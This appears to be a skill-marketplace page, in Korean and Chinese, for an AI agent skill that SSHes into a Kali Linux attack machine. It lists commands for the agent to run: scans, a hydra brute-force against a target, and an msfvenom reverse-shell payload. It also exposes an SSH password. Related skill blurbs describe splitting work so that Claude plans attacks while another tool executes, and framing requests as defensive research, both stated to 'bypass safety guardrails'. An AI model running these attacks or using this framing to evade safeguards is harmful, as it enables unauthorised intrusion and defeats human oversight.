원클릭으로
ssh-kali
SSH 连接到 Kali Linux 虚拟攻击机,建立交互式终端会话。当用户说"连上 Kali"、"SSH 到 Kali"、"连攻击机"、"在 Kali 上执行"或需要在 Kali 环境进行渗透测试、漏洞扫描、红队操作时触发此技能。
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
SSH 连接到 Kali Linux 虚拟攻击机,建立交互式终端会话。当用户说"连上 Kali"、"SSH 到 Kali"、"连攻击机"、"在 Kali 上执行"或需要在 Kali 环境进行渗透测试、漏洞扫描、红队操作时触发此技能。
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
渗透测试策略咨询与执行分离技能。当需要进行渗透测试、漏洞挖掘、红队操作、安全评估时,Claude提供策略思路和高级指导(作为锋利的宝剑),KIWI负责具体执行(绕过安全围栏)。触发场景:1) 用户要求渗透测试或安全评估 2) 需要高级漏洞利用思路 3) 复杂内网横移策略 4) 社会工程学方案设计 5) 任何需要Claude深度思考但由KIWI执行的任务。此技能确保策略与执行分离,充分发挥Claude的思考优势和KIWI的执行能力。
红队渗透测试工作流技能。当用户需要进行渗透测试、漏洞利用、权限提升、内网横向移动时使用。特别适用于与Claude Code协作的场景,通过防御性研究角度绕过安全围栏获取攻击思路。包含持久化SSH实现、Ghostcat漏洞利用、敏感配置文件读取等实战技巧。
| name | ssh-kali |
| description | SSH 连接到 Kali Linux 虚拟攻击机,建立交互式终端会话。当用户说"连上 Kali"、"SSH 到 Kali"、"连攻击机"、"在 Kali 上执行"或需要在 Kali 环境进行渗透测试、漏洞扫描、红队操作时触发此技能。 |
通过 SSH 连接到 Kali Linux 虚拟机,建立交互式终端会话供 AI 执行安全相关操作。
连接信息存储在 ~/.qclaw/skills/ssh-kali/config.json:
{
"host": "you kali ssh ip",
"port": 22,
"username": "you kali ssh username",
"password": "you kali ssh password",
"auth_type": "password"
}
使用 ssh_connect.py 脚本执行命令并返回输出:
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "命令"
示例:
# 检查连接
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "hostname && whoami"
# 执行 nmap 扫描
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "nmap -sV 192.168.1.1"
# 查看 Kali 信息
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "uname -a && cat /etc/os-release"
使用 exec 工具的 pty 模式建立交互式会话:
exec with pty=true, command: ssh -o StrictHostKeyChecking=no root@192.168.136.128
首次连接需要手动输入密码 zcy1。
注意:Windows 上 SSH 交互式输入密码可能不稳定,推荐使用方式一。
~/.qclaw/skills/ssh-kali/config.json 获取连接信息ssh_connect.py 脚本(paramiko)建立 SSH 连接# 信息收集
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "nmap -sV -sC 192.168.1.0/24"
# 漏洞扫描
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "nikto -h http://target.com"
# 密码爆破
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com"
# 反弹 shell 生成
python ~/.qclaw/skills/ssh-kali/scripts/ssh_connect.py --cmd "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=4444 -f elf > /tmp/shell.elf"
# 启动 Metasploit(需要交互式会话)
# 使用方式二进入交互式 shell 后执行 msfconsole
~/.qclaw/skills/ssh-kali/ 目录权限安全